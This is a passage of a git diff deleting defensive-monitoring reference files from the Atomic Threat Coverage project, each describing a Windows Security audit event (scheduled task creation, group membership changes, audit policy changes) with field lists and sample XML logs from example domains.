-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4698.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4698.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>TaskName</li><li>TaskContent</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4698</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12804</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-23T02:03:06.944522200Z" /> 
-    <EventRecordID>344740</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="5048" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x364eb</Data> 
-    <Data Name="TaskName">\\Microsoft\\StartListener</Data> 
-    <Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals> <Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0065_4701_scheduled_task_was_disabled.md b/Atomic_Threat_Coverage/Data_Needed/DN0065_4701_scheduled_task_was_disabled.md
deleted file mode 100644
index 40b48e7..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0065_4701_scheduled_task_was_disabled.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0065_4701_scheduled_task_was_disabled       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time a scheduled task is disabled |
-| **Logging Policy** | <ul><li>[LP0041_windows_audit_other_object_access_events](../Logging_Policies/LP0041_windows_audit_other_object_access_events.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4701.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4701.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>TaskName</li><li>TaskContent</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4701</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12804</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-23T02:32:45.844066600Z" /> 
-    <EventRecordID>344860</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="4364" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x364eb</Data> 
-    <Data Name="TaskName">\\Microsoft\\StartListener</Data> 
-    <Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals> <Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>false</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0066_4704_user_right_was_assigned.md b/Atomic_Threat_Coverage/Data_Needed/DN0066_4704_user_right_was_assigned.md
deleted file mode 100644
index 500e14a..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0066_4704_user_right_was_assigned.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0066_4704_user_right_was_assigned       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time local user right policy is changed and  user right was assigned to an account. You will see unique event for  every user |
-| **Logging Policy** | <ul><li>[LP0105_windows_audit_authorization_policy_change](../Logging_Policies/LP0105_windows_audit_authorization_policy_change.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4704.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4704.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>TargetSid</li><li>PrivilegeList</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4704</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13570</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-10-02T22:08:07.136050600Z" /> 
-    <EventRecordID>1049866</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="500" ThreadID="1216" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-18</Data> 
-    <Data Name="SubjectUserName">DC01$</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x3e7</Data> 
-    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="PrivilegeList">SeAuditPrivilege SeIncreaseWorkingSetPrivilege</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0067_4719_system_audit_policy_was_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0067_4719_system_audit_policy_was_changed.md
deleted file mode 100644
index 35235e7..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0067_4719_system_audit_policy_was_changed.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0067_4719_system_audit_policy_was_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates when the computer's audit policy changes. This event is always logged regardless of the "Audit Policy Change"  sub-category setting |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4719.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4719.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>CategoryId</li><li>SubcategoryId</li><li>SubcategoryGuid</li><li>AuditPolicyChanges</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4719</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13568</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-30T19:57:09.668217100Z" /> 
-    <EventRecordID>1049418</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="4668" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-18</Data> 
-    <Data Name="SubjectUserName">DC01$</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x3e7</Data> 
-    <Data Name="CategoryId">%%8274</Data> 
-    <Data Name="SubcategoryId">%%12807</Data> 
-    <Data Name="SubcategoryGuid">{0CCE9223-69AE-11D9-BED3-505054503030}</Data> 
-    <Data Name="AuditPolicyChanges">%%8448, %%8450</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0068_4728_member_was_added_to_security_enabled_global_group.md b/Atomic_Threat_Coverage/Data_Needed/DN0068_4728_member_was_added_to_security_enabled_global_group.md
deleted file mode 100644
index 870b443..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0068_4728_member_was_added_to_security_enabled_global_group.md
+++ /dev/null
@@ -1,54 +0,0 @@
-| Title              | DN0068_4728_member_was_added_to_security_enabled_global_group       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Member was added to a security-enabled global group |
-| **Logging Policy** | <ul><li>[LP0101_windows_audit_security_group_management](../Logging_Policies/LP0101_windows_audit_security_group_management.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4728](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4728)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>MemberName</li><li>MemberSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-      <EventID>4728</EventID> 
-      <Version>0</Version> 
-      <Level>0</Level> 
-      <Task>13826</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8020000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-03-11T17:02:55.932712400Z" /> 
-      <EventRecordID>4408768</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="704" ThreadID="852" /> 
-      <Channel>Security</Channel> 
-      <Computer>atc-win-2k16.atc.local</Computer> 
-      <Security /> 
-    </System>
-  - <EventData>
-      <Data Name="MemberName">CN=test_user,CN=Users,DC=atc,DC=local</Data> 
-      <Data Name="MemberSid">S-1-5-21-2245550993-2622282683-2531201460-18603</Data> 
-      <Data Name="TargetUserName">Domain Admins</Data> 
-      <Data Name="TargetDomainName">ATC</Data> 
-      <Data Name="TargetSid">S-1-5-21-2245550993-2622282683-2531201460-512</Data> 
-      <Data Name="SubjectUserSid">S-1-5-21-2245550993-2622282683-2531201460-500</Data> 
-      <Data Name="SubjectUserName">demouser</Data> 
-      <Data Name="SubjectDomainName">ATC</Data> 
-      <Data Name="SubjectLogonId">0x109a6c</Data> 
-      <Data Name="PrivilegeList">-</Data> 
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0069_4732_member_was_added_to_security_enabled_local_group.md b/Atomic_Threat_Coverage/Data_Needed/DN0069_4732_member_was_added_to_security_enabled_local_group.md
deleted file mode 100644
index d0ce4b9..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0069_4732_member_was_added_to_security_enabled_local_group.md
+++ /dev/null
@@ -1,54 +0,0 @@
-| Title              | DN0069_4732_member_was_added_to_security_enabled_local_group       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time a new member was added to a  security-enabled (security) local group. This event generates  on domain controllers, member servers, and workstations |
-| **Logging Policy** | <ul><li>[LP0101_windows_audit_security_group_management](../Logging_Policies/LP0101_windows_audit_security_group_management.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4732.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4732.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>MemberName</li><li>MemberSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4732</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13826</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-19T03:02:38.563110400Z" /> 
-    <EventRecordID>174856</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="512" ThreadID="1092" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="MemberName">CN=eadmin,CN=Users,DC=contoso,DC=local</Data> 
-    <Data Name="MemberSid">S-1-5-21-3457937927-2839227994-823803824-500</Data> 
-    <Data Name="TargetUserName">AccountOperators</Data> 
-    <Data Name="TargetDomainName">CONTOSO</Data> 
-    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data> 
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x3031e</Data> 
-    <Data Name="PrivilegeList">-</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0070_4735_security_enabled_local_group_was_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0070_4735_security_enabled_local_group_was_changed.md
deleted file mode 100644
index aa0049e..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0070_4735_security_enabled_local_group_was_changed.md
+++ /dev/null
@@ -1,54 +0,0 @@
-| Title              | DN0070_4735_security_enabled_local_group_was_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time a security-enabled (security) local group is changed. This event generates on domain controllers, member servers, and workstations |
-| **Logging Policy** | <ul><li>[LP0101_windows_audit_security_group_management](../Logging_Policies/LP0101_windows_audit_security_group_management.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4735.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4735.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li><li>SamAccountName</li><li>SidHistory</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4735</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13826</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-19T02:00:45.537440000Z" /> 
-    <EventRecordID>174850</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="512" ThreadID="1092" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="TargetUserName">AccountOperators\_NEW</Data> 
-    <Data Name="TargetDomainName">CONTOSO</Data> 
-    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data> 
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x3031e</Data> 
-    <Data Name="PrivilegeList">-</Data> 
-    <Data Name="SamAccountName">AccountOperators\_NEW</Data> 
-    <Data Name="SidHistory">-</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0071_4737_security_enabled_global_group_was_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0071_4737_security_enabled_global_group_was_changed.md
deleted file mode 100644
index b171cba..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0071_4737_security_enabled_global_group_was_changed.md
+++ /dev/null
@@ -1,54 +0,0 @@
-| Title              | DN0071_4737_security_enabled_global_group_was_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Security-enabled global group was changed |
-| **Logging Policy** | <ul><li>[LP0101_windows_audit_security_group_management](../Logging_Policies/LP0101_windows_audit_security_group_management.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4737](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4737)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li><li>SamAccountName</li><li>SidHistory</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-      <EventID>4737</EventID> 
-      <Version>0</Version> 
-      <Level>0</Level> 
-      <Task>13826</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8020000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-03-20T17:02:42.762560800Z" /> 
-      <EventRecordID>4408769</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="704" ThreadID="852" /> 
-      <Channel>Security</Channel> 
-      <Computer>atc-win-2k16.atc.local</Computer> 
-      <Security /> 
-    </System>
-  - <EventData>
-      <Data Name="TargetUserName">Domain Admins</Data> 
-      <Data Name="TargetDomainName">ATC</Data> 
-      <Data Name="TargetSid">S-1-5-21-2245550993-2622282683-2531201460-512</Data> 
-      <Data Name="SubjectUserSid">S-1-5-21-2245550993-2622282683-2531201460-500</Data> 
-      <Data Name="SubjectUserName">demouser</Data> 
-      <Data Name="SubjectDomainName">ATC</Data> 
-      <Data Name="SubjectLogonId">0x109a6c</Data> 
-      <Data Name="PrivilegeList">-</Data> 
-      <Data Name="SamAccountName">-</Data> 
-      <Data Name="SidHistory">-</Data> 
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0072_4755_security_enabled_universal_group_was_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0072_4755_security_enabled_universal_group_was_changed.md
deleted file mode 100644
index 6dfd072..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0072_4755_security_enabled_universal_group_was_changed.md
+++ /dev/null
@@ -1,54 +0,0 @@
-| Title              | DN0072_4755_security_enabled_universal_group_was_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Security-enabled universal group was changed |
-| **Logging Policy** | <ul><li>[LP0101_windows_audit_security_group_management](../Logging_Policies/LP0101_windows_audit_security_group_management.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4755](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4755)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li><li>SamAccountName</li><li>SidHistory</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-      <EventID>4755</EventID> 
-      <Version>0</Version> 
-      <Level>0</Level> 
-      <Task>13826</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8020000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-03-20T17:06:43.662560800Z" /> 
-      <EventRecordID>4405438</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="704" ThreadID="2584" /> 
-      <Channel>Security</Channel> 
-      <Computer>atc-win-2k16.atc.local</Computer> 
-      <Security /> 
-    </System>
-  - <EventData>
-      <Data Name="TargetUserName">Enterprise Admins</Data> 
-      <Data Name="TargetDomainName">ATC</Data> 
-      <Data Name="TargetSid">S-1-5-21-2245550993-2622282683-2531201460-519</Data> 
-      <Data Name="SubjectUserSid">S-1-5-21-2245550993-2622282683-2531201460-500</Data> 
-      <Data Name="SubjectUserName">demouser</Data> 
-      <Data Name="SubjectDomainName">ATC</Data> 
-      <Data Name="SubjectLogonId">0x109a6c</Data> 
-      <Data Name="PrivilegeList">-</Data> 
-      <Data Name="SamAccountName">-</Data> 
-      <Data Name="SidHistory">-</Data> 
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0073_4756_member_was_added_to_a_security_enabled_universal_group.md b/Atomic_Threat_Coverage/Data_Needed/DN0073_4756_member_was_added_to_a_security_enabled_universal_group.md
deleted file mode 100644
index ca172b8..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0073_4756_member_was_added_to_a_security_enabled_universal_group.md
+++ /dev/null
@@ -1,54 +0,0 @@
-| Title              | DN0073_4756_member_was_added_to_a_security_enabled_universal_group       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Member was added to a security-enabled universal group |
-| **Logging Policy** | <ul><li>[LP0101_windows_audit_security_group_management](../Logging_Policies/LP0101_windows_audit_security_group_management.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4756](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4756)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>MemberName</li><li>MemberSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-      <EventID>4756</EventID> 
-      <Version>0</Version> 
-      <Level>0</Level> 
-      <Task>13826</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8020000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-03-20T17:08:41.465560800Z" /> 
-      <EventRecordID>4405437</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="704" ThreadID="2584" /> 
-      <Channel>Security</Channel> 
-      <Computer>atc-win-2k16.atc.local</Computer> 
-      <Security /> 
-    </System>
-  - <EventData>
-      <Data Name="MemberName">CN=demouser,CN=Users,DC=atc,DC=local</Data> 
-      <Data Name="MemberSid">S-1-5-21-2245550993-2690282630-2861202560-18603</Data> 
-      <Data Name="TargetUserName">Enterprise Admins</Data> 
-      <Data Name="TargetDomainName">ATC</Data> 
-      <Data Name="TargetSid">S-1-5-21-2245550993-2622282683-2531201460-519</Data> 
-      <Data Name="SubjectUserSid">S-1-5-21-2245550993-2622282683-2531201460-500</Data> 
-      <Data Name="SubjectUserName">test_user</Data> 
-      <Data Name="SubjectDomainName">ATC</Data> 
-      <Data Name="SubjectLogonId">0x109a6c</Data> 
-      <Data Name="PrivilegeList">-</Data> 
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0074_4765_sid_history_was_added_to_an_account.md b/Atomic_Threat_Coverage/Data_Needed/DN0074_4765_sid_history_was_added_to_an_account.md
